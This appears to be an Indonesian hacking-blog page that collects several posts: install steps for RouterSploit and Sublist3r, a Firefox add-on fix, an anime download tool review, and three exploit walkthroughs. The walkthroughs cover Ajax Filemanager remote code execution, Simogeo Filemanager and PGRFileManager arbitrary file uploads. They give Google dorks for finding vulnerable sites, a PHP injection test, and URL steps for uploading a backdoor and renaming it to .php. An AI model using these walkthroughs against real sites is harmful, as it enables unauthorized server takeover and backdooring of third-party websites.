Heboh WOW

RouterSploit  - Tools Exploitation Framework For Embedded Devices tools Ini terdiri dari berbagai modul yang membantu dalam penetration testing yaitu : - modul yang memanfaatkan kerentanan yang teridentifikasi - modul yang dirancang untuk menguji kredensial terhadap layanan jaringan - modul yang memeriksa apakah target rentan terhadap eksploitasi apa pun Install di Kali Linux apt-get install python3-pip git clone https :// www . github . com / threat9 / routersploit cd routersploit python3 -m pip install -r requirements.txt python3 rsf.py Bluetooth Low Energy support: apt-get install libglib2.0-dev python3 -m pip install bluepy python3 rsf.py Install di Ubuntu 18.04 & 17.10 sudo add-apt-repository universe sudo apt-get install git python3-pip git clone https :// www . github . com / threat9 / routersploit cd routersploit python3 -m pip install -r requirements.txt python3 rsf.py Bluetooth Low Energy support: apt-get install libglib2.0-dev python3 -m pip install bluepy python3 rsf.py

Ajax Filemanager memiliki bug yang sangat fatal yaitu Remote Code Execution atau bisa di sebut juga RCE , yah kalian pasti tau sendiri kalo RCE itu sangat fatal ok langsung saja kita coba pertama siapin plugins adds on Firefox Hackbar jika sudah langsung nyalain hackbar nya (di bagian atas firefox klik kanan centang hackbar ) setelah hackbar muncul, ada tulisan Enable postdata di centang   dork : Index Of Ajaxfilemanager Index Of /inc/data.php inurl:/Ajaxfilemanager Jika sudah dapat,  cek dulu bugnya di file Ajax_create_folder.php dan data.php Jika di Execute tidak ada apapun , atau error 403 Forbiden dll , maka hasilnya kita bisa lihat di direktori /ajaxfilemanager/inc/data.php Jika hasil test bug kita bisa di eksekusi,  sekarang kita coba dengan script kecil/ringan test=<?php phpinfo(); ?>   lalu tekan execute di menu Hackbar. dan hasilnya seperti gambar dibawah ini. jika muncul seperti gambar ini berarti kita bisa di eksekusi seperti upload file ke server atau upload backdoo

  Simogeo Filemanager - Arbitrary File Upload       hai gaes lama saya tidak upload artikel terbaru karena sibuk real life hehehe , kali ini saya akan berbagi eksploit udah lama sih sebenernya tapi baru baru ini viral nya . yap langsung saja lah kita cobain , dork : inurl:/js/filemanager/index.html inurl:/filemanager site: exploit: /connectors/php/filemanager.php?mode=rename&old=/ [path] /userfiles/namafile.jpg&new=namafilenew.php&config=filemanager.config.js ngedork dulu ea gaes :'v kalo dah ketemu  , upload file backdoor extensi .jpg ( contoh : namafile.jpg ) setelah terupload , kita rename file backdoor nya dari extensi .jpg ke .php supaya backdoor kita dapat di akses , caranya site/ [path] /filemanager /connectors/php/filemanager.php?mode=rename&old=/ [path] /userfiles/namafile.jpg&new=namafilenew.php&config=filemanager.config.js jangan lupa ya gaes [path] nya di ganti berdasarkan path di web target nya jika rename berhasil maka muncul tulisan seperti

  Solusi Tamper Data Tidak Dapat Dipasang      entah kenapa pasang adds-on Tamper Data susah amat ya, padahal udah bener di bawah versi firefox quantum , namun tetep aja gagal dan muncul tulisan Tamper Data tidak bisa di pasang ,       nah setelah saya menyelam ke beberapa grup IT, saya bertanya dan akhirnya saya menemukan solusi nya . yaitu setting config firefox supaya bisa di install adds-on nya, kuy langsung saja di coba ketik aja " about:config " nanti muncul notifikasi seperti gambar di bawah ini klik tombol biru "I'll be careful, I promise!" lalu kita search " xpinst " setelah muncul beberapa nama config, edit sesuai gambar di bawah ini jika sudah , sekarang ganti search " compatible " edit beberapa config nya juga seperti gambar di bawah ini jika sudah di edit , langsung saja kita install Tamper Data kita dan taraaaaaa Tamper data berhasil di install tinggal kita restart firefox kita dan Tamper Data siap di pakai :) semoga bermanfaat

Sublist3r v1.0 - Fast subdomains enumeration tool   git clone https :// github . com / aboul3la / Sublist3r . git Install di Windows: c:\python27\python.exe -m pip install -r requirements.txt Install di lLinux sudo pip install -r requirements.txt  sebagai alternatif , setiap module dapat di install secara independen seperti di bawah ini Requests Module ( http://docs.python-requests.org/en/latest/ ) Install di Windows: c:\python27\python.exe -m pip install requests Install di Ubuntu/Debian: sudo apt-get install python-requests Install menggunakan pip on Linux: sudo pip install requests dnspython Module ( http://www.dnspython.org/ ) Install di Windows: c:\python27\python.exe -m pip install dnspython Install di Ubuntu/Debian: sudo apt-get install python-dnspython Install menggunakan pip: sudo pip install dnspython argparse Module Install di Ubuntu/Debian: sudo apt-get install python-argparse Install menggunakan pip: sudo pip install argparse for coloring in windows install the following

Samehadaku Download Link Generator      untuk para pecinta anime di samehadaku , kalian di suguhkan tools short link generator untuk download film di samehadaku buatan P4kL0nc4t , nah tools ini memudahkan kita untuk mendownload film yang kita cari di situs samehadaku.tv , langsung saja yak kita coba review tools nya      tools nya sih kalo di liat simple banget namun sangat bagus dan bermanfaat sekali , ngoding nya pasti hard juga wkwkwk :v link tools : https://www.loncatbyte.space/samehadaku-dlg/        gini nih tampilan nya , coba langsung di masukkan kata kata kita mau cari apa , misal nih mau cari boruto episode 75         langsung ketik ada di kolom lalu klik "Query" maka tools nya akan berjalan mencari link download nya         setelah itu muncul pop up , yeah muncul boruto episode 75 subtitle indonesia , kalo bisa sih kalo nyari film nya yang detail ya misal judul film dan beserta episode nya , kalo kurang lengkap biasanya link download film nya ngacak ngacak.     kalo

///////////////////////////////////////////////// # Exploit Title: PGRFileManager arbitraty file upload # Google Dork:      inurl:/pgrfilemanager/ index of # Date: - # Exploit Author: - # Team: - # Vendor Homepage: http://pgrfilemanager.sourceforge.net/ # Tested on: Mozilla firefox 40.0 Windows 7 ultimate x64 ************************************************ {+} search the dork in google search engine or other {+} open target {+} exploit : localhost/path/pgrfilemanager/php/upload.php {+} vuln ? blank {+} open CSRF HERE        post file = Filedata        upload file ext php, html , jpg or other ( bypass ext ) {+} Access file : localhost/path/pgrfilemanager/userfiles/namefile.php *********************************************** thanks to Zi-slow \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\